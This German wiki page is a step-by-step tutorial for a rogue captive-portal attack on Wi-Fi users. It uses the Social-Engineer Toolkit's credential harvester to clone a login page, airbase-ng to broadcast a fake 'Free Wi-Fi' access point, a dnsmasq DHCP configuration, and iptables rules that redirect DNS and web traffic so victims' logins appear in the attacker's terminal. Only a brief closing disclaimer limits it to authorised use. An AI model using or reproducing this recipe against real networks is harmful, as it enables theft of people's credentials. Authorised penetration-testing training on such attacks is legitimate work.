Captive Portal Angriffe SET
Version vom 15. August 2024, 06:10 Uhr von Thomas.will (Diskussion | Beiträge) (Die Seite wurde neu angelegt: „== Captive Portal mit SET (Social-Engineer Toolkit) == === Voraussetzungen === * '''Kali Linux''': SET ist auf Kali Linux vorinstalliert. * '''Wireless Networ…“)
Captive Portal mit SET (Social-Engineer Toolkit)
Voraussetzungen
- Kali Linux: SET ist auf Kali Linux vorinstalliert.
- Wireless Network Adapter: Ein Adapter, der den Access Point Modus unterstützt.
- SET: Der Social-Engineer Toolkit ist vorinstalliert auf Kali Linux.
Schritt-für-Schritt-Anleitung
SET starten:
- Öffne ein Terminal und starte SET mit dem folgenden Befehl:
sudo setoolkit
Social-Engineering-Attacken-Menü:
- Im SET-Hauptmenü wählst du die Option
1(Social-Engineering Attacks).
Website Attack Vectors:
- Wähle die Option
2(Website Attack Vectors).
Credential Harvester Attack Method:
- Wähle die Option
3(Credential Harvester Attack Method).
Site Cloner:
- Wähle die Option
2(Site Cloner).
IP-Adresse eingeben:
- Du wirst nach der IP-Adresse deines Kali Linux Systems gefragt, die als Gateway für das Captive Portal fungieren soll. Gib diese IP-Adresse ein.
Ziel-Website klonen:
- Du wirst nun nach der URL der Website gefragt, die du klonen möchtest. Gib hier die URL einer Seite ein, die das Captive Portal simulieren soll (z.B. eine Login-Seite eines bekannten WLAN-Anbieters).
Erstellung des Access Points:
- Jetzt musst du einen Access Point erstellen, der die Benutzer zu deinem Captive Portal weiterleitet. Dies kann durch ein separates Tool wie
airbase-ngoder durch die Konfiguration eines WLAN-Access-Points mittelshostapderfolgen.- Beispiel mit
airbase-ng:
- Beispiel mit
sudo airbase-ng -e "Free Wi-Fi" -c 6 wlan0
- Dies erstellt einen Access Point namens "Free Wi-Fi" auf Kanal 6.
DHCP-Server konfigurieren:
- Um den Benutzern IP-Adressen zuzuweisen, konfiguriere einen DHCP-Server. Dies kann über
dnsmasqerfolgen. Erstelle eine Konfigurationsdatei (z.B.dnsmasq.conf):
interface=wlan0 dhcp-range=192.168.1.10,192.168.1.50,12h dhcp-option=3,192.168.1.1 dhcp-option=6,192.168.1.1
- Starte den DHCP-Server:
sudo dnsmasq -C dnsmasq.conf
DNS-Server manipulieren:
- Um alle Anfragen auf die IP-Adresse deines Kali-Systems umzuleiten, kannst du
iptablesverwenden:
sudo iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.1.1 sudo iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 192.168.1.1
Benutzer verbinden und Anmeldedaten abfangen:
- Sobald sich Benutzer mit dem Access Point verbinden und eine Website öffnen, werden sie zum gefälschten Captive Portal weitergeleitet. Hier können sie ihre Anmeldedaten eingeben, die dann im SET-Terminal angezeigt werden.
Wichtiger Hinweis
Dieser Prozess darf nur in einem legalen und ethischen Kontext durchgeführt werden, beispielsweise in einer kontrollierten Umgebung oder mit ausdrücklicher Genehmigung der Zielpersonen. Der Missbrauch solcher Werkzeuge und Methoden ist illegal und strafbar.
Wenn SET nicht vorinstalliert ist, kann es mit dem Befehl sudo apt-get install setoolkit installiert werden.